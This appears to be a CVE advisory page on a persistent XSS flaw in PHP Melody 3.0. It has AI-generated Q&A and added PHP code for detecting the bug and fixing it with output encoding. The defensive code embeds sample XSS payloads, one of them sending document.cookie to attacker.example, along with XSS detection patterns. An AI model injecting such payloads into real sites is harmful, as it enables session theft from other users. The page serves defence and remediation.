CVE-2021-47914
Persistent XSS in PHP Melody 3.0 edit-video.php Allows Hijacking
Publication date: 2026-02-01
Last updated on: 2026-02-11
Assigner: VulnCheck
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| phpsugar | php_melody | 3.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47914 is a persistent cross-site scripting (XSS) vulnerability in PHP Melody version 3.0. It exists in the 'submitted' parameter of the 'edit-video.php' script, which does not properly neutralize input. This allows remote attackers with certain privileges (such as editors or moderators) to inject malicious JavaScript code that is stored persistently. When the affected video page is viewed (via 'watch.php'), the malicious script executes, enabling attacks like session hijacking, persistent phishing, and manipulation of application modules. [1, 2]
How can this vulnerability impact me?
This vulnerability can lead to several security impacts including session hijacking, where attackers can steal user sessions; persistent phishing by injecting malicious content that deceives users; external redirects to malicious sites; and manipulation of application modules, potentially compromising the integrity and functionality of the application. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided resources do not specify how this vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring POST requests to the 'edit-video.php' script and looking for script-bearing input in the 'submitted' parameter. Note that ordinary web server access logs do not record POST bodies, so this inspection has to happen at a reverse proxy, a web application firewall (WAF), or in application-level request logging. The sources provide no specific commands, but the vulnerability can be confirmed on a test instance by using curl or Burp Suite, with an account that has the editing privileges the bug requires, to submit a harmless canary string in the 'submitted' parameter and then checking whether 'watch.php' returns that string unescaped; a patched version renders it as inert text (for example '<' becomes '&lt;'). A WAF rule on the same parameter can also be used to block exploitation attempts while the fix is rolled out. [2]
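The two checks described above, as an added example that is not code from PHP Melody, VulnCheck or the cited resources: one function flags a captured POST to edit-video.php whose 'submitted' value carries executable markup, the other decides whether a canary came back from watch.php unescaped. Only the script name and the 'submitted' parameter come from the advisory; the Host header, the other form fields, the canary value and the HTML fragments in the demo are constructed samples.

```php
<?php
// Added example: detection helpers for CVE-2021-47914 (not PHP Melody's own code).
// Only 'edit-video.php' and the 'submitted' parameter are taken from the advisory;
// every other field name, header and HTML fragment below is constructed.

declare(strict_types=1);

/** Split a raw HTTP request into [request line, lower-cased headers, body]. */
function parse_raw_request(string $raw): array
{
    $raw = str_replace("\r\n", "\n", $raw);
    [$head, $body] = array_pad(explode("\n\n", $raw, 2), 2, '');
    $lines = explode("\n", $head);
    $requestLine = (string) array_shift($lines);
    $headers = [];
    foreach ($lines as $line) {
        if (strpos($line, ':') !== false) {
            [$name, $value] = explode(':', $line, 2);
            $headers[strtolower(trim($name))] = trim($value);
        }
    }
    return [$requestLine, $headers, $body];
}

/** True when a value contains markup a browser could execute (entity-decoded first). */
function looks_like_xss(string $value): bool
{
    $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $patterns = [
        '~<\s*script\b~i',                     // <script ...>
        '~<\s*(iframe|object|embed|svg)\b~i',  // other script-capable elements
        '~\bon[a-z]+\s*=~i',                   // onerror=, onload=, ...
        '~javascript\s*:~i',                   // javascript: URLs
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $decoded) === 1) {
            return true;
        }
    }
    return false;
}

/**
 * Returns the offending 'submitted' value when the request is a POST to
 * edit-video.php carrying script-like input, or null otherwise.
 */
function flag_edit_video_request(string $raw): ?string
{
    [$requestLine, , $body] = parse_raw_request($raw);
    if (preg_match('~^POST\s+\S*edit-video\.php~', $requestLine) !== 1) {
        return null;
    }
    parse_str($body, $params);            // parse_str already URL-decodes the values
    $value = $params['submitted'] ?? null;
    if (!is_string($value)) {
        return null;
    }
    return looks_like_xss($value) ? $value : null;
}

/**
 * True when the canary previously stored via 'submitted' appears verbatim in the
 * watch.php response, i.e. without HTML encoding. Pick a canary that contains
 * '<' so that the encoded and unencoded forms differ.
 */
function canary_rendered_unescaped(string $watchHtml, string $canary): bool
{
    $encoded = htmlspecialchars($canary, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $encoded !== $canary && strpos($watchHtml, $canary) !== false;
}

// Constructed request: a privileged user posting a cookie-stealing payload.
$request = "POST /edit-video.php HTTP/1.1\r\n"
    . "Host: melody.example\r\n"
    . "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    . 'id=42&title=Demo&submitted=' . urlencode('<script>alert(document.cookie)</script>');
var_dump(flag_edit_video_request($request));  // the decoded <script> payload

// Constructed watch.php fragments: vulnerable output versus fixed output.
$canary = '<cve47914-canary>';
var_dump(canary_rendered_unescaped('<span>' . $canary . '</span>', $canary));                                   // true
var_dump(canary_rendered_unescaped('<span>' . htmlspecialchars($canary, ENT_QUOTES | ENT_HTML5) . '</span>', $canary)); // false
```

Feed flag_edit_video_request() the request bodies your WAF or reverse proxy records (ModSecurity audit logs, for instance); plain access logs will not contain them. The canary check is meant for a staging copy of the application, since a positive result means you have just stored executable markup that every viewer of that video page will receive.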
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) encoding the stored 'submitted' value for its HTML context wherever 'watch.php' (or any other page) outputs it, which is the fix that actually closes the bug; 2) filtering the 'submitted' parameter in POST requests to 'edit-video.php' so that obvious script markup is rejected, as a second layer rather than the primary defence, since input filtering alone is routinely bypassed; 3) restricting the characters accepted in transmitted parameters where the field's purpose allows it; 4) deploying security headers (a Content-Security-Policy and HttpOnly session cookies reduce what an injected script can do) and a web application firewall rule covering the parameter. Applying the vendor's patch released on September 22, 2021, is the step that fully remediates the vulnerability. [2]
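The output-encoding fix from step 1 and the headers from step 4, shown as an added example rather than PHP Melody's own code or the vendor's patch: the unsafe echo pattern that a persistent XSS like this implies, next to the hardened form. The $row array stands in for a record read back from the database, the column name and the CSS class are assumed, and the payload in the demo is constructed.

```php
<?php
// Added example (not PHP Melody's own code or the vendor's patch): output
// encoding for a stored value that ends up on watch.php, plus defence-in-depth
// headers. $row mimics a database record; its column name is assumed.

declare(strict_types=1);

/** Vulnerable pattern: the stored value is concatenated into HTML unchanged. */
function render_submitted_unsafe(array $row): string
{
    return '<span class="submitted-by">' . $row['submitted'] . '</span>';
}

/** Hardened: encode for the HTML text context at the moment of output. */
function render_submitted_safe(array $row): string
{
    $safe = htmlspecialchars((string) $row['submitted'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<span class="submitted-by">' . $safe . '</span>';
}

/**
 * Attribute context: the same call, but ENT_QUOTES matters here because a
 * double quote in the value would otherwise end the attribute and allow
 * onmouseover="..." style injection.
 */
function render_submitted_attr_safe(array $row): string
{
    $safe = htmlspecialchars((string) $row['submitted'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="/watch.php" title="' . $safe . '">watch</a>';
}

/**
 * Defence in depth, to be called before any output is sent: a restrictive CSP
 * stops inline and third-party scripts, and HttpOnly session cookies cannot be
 * read by document.cookie, which blunts the session-hijacking payoff.
 */
function send_hardening_headers(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    header('X-Content-Type-Options: nosniff');
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_samesite', 'Lax');
}

// Constructed payload of the kind the advisory describes (cookie exfiltration).
$row = ['submitted' => '<script>location="https://attacker.example/?c="+document.cookie</script>'];

echo render_submitted_unsafe($row), PHP_EOL;     // <script> survives: executes in every viewer's browser
echo render_submitted_safe($row), PHP_EOL;       // &lt;script&gt;... rendered as visible, inert text
echo render_submitted_attr_safe($row), PHP_EOL;  // quotes become &quot;, attribute cannot be broken out of
```

The encoding belongs at output time, not at storage time: a value encoded once on the way in will be double-encoded if it is ever output by code that encodes correctly, and will still be unsafe if it is output into a different context (a JavaScript string, a URL) that needs a different encoder. Character blacklists on the input side, as suggested in step 3, are acceptable as an extra layer but should never be the only control.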